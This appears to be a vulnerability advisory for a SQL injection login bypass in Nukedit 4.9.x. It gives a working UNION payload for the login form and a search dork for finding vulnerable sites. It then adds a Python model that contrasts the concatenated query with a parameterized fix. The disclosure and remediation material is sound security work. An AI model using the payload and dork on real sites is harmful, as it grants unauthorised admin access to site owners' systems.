Nukedit version 4.9.x suffers from a SQL injection vulnerability that allows for login bypass.
#Title: Nukedit 4.9.x Login Bypass SQL injection
#
#Discovered By: r3dm0v3
# https://r3dm0v3.persianblog.ir
# r3dm0v3( 4t ) yahoo [dot] com
# Tehran - Iran
#
#Download: https://www.nukedit.com/content/Download.asp
#Vulnerable: 4.9.x; prior versions may be vulnerable
#Remote: Yes
#Dork: "Powered by Nukedit"
# inurl:utilities/login.asp
#Fix: Not Available
#POC:
#Go to https://target.com/[path_to_nukedit]/utilities/login.asp and fill in the login fields as below:
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
#Password: r3dm0v3
#Click Login and you will be logged in as an admin.
#There are some other SQL injections in other pages.
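
The bypass above relies on the Email value being concatenated into the login query, so that a UNION can return a row whose password hash the submitter chose. The following Python/sqlite3 model shows that query pattern beside a parameterized one; it is an added example, not Nukedit's code or the author's. The 4-column table, the `hash_pw` scheme and all function names are assumptions.

```python
import hashlib
import hmac
import sqlite3

def hash_pw(password):
    # Stand-in hash (assumption): the page does not say how Nukedit derives "ENC..." values.
    return "ENC" + hashlib.sha256(password.encode()).hexdigest()

def make_db():
    # Constructed 4-column stand-in for tblusers (the PoC implies 20 columns).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblusers (id INTEGER, email TEXT, name TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO tblusers VALUES (1, 'admin@example.test', 'admin', ?)",
               (hash_pw("correct horse"),))
    return db

def login_vulnerable(db, email, password):
    # The email is pasted into the SQL text, so a quote inside it closes the string
    # literal and the remainder is parsed as SQL. A UNION can then return a row the
    # caller wrote, including the hash the password is compared against.
    sql = "SELECT name, pw_hash FROM tblusers WHERE email = '" + email + "'"
    row = db.execute(sql).fetchone()
    return row[0] if row and row[1] == hash_pw(password) else None

def login_fixed(db, email, password):
    # The email is bound as a parameter and is only ever compared as data.
    row = db.execute("SELECT name, pw_hash FROM tblusers WHERE email = ?",
                     (email,)).fetchone()
    if row and hmac.compare_digest(row[1], hash_pw(password)):
        return row[0]
    return None

def demo():
    db = make_db()
    # Constructed input in the shape of the PoC's Email field, cut down to two columns.
    email = ("' union select 'injected', '" + hash_pw("chosen")
             + "' from tblusers where 'x'='x")
    return {
        "vulnerable_injected": login_vulnerable(db, email, "chosen"),
        "fixed_injected": login_fixed(db, email, "chosen"),
        "fixed_legit": login_fixed(db, "admin@example.test", "correct horse"),
        "fixed_wrong_pw": login_fixed(db, "admin@example.test", "chosen"),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```

In classic ASP the corresponding change is to run the lookup through an ADODB.Command with bound parameters instead of building the SQL string from the form fields.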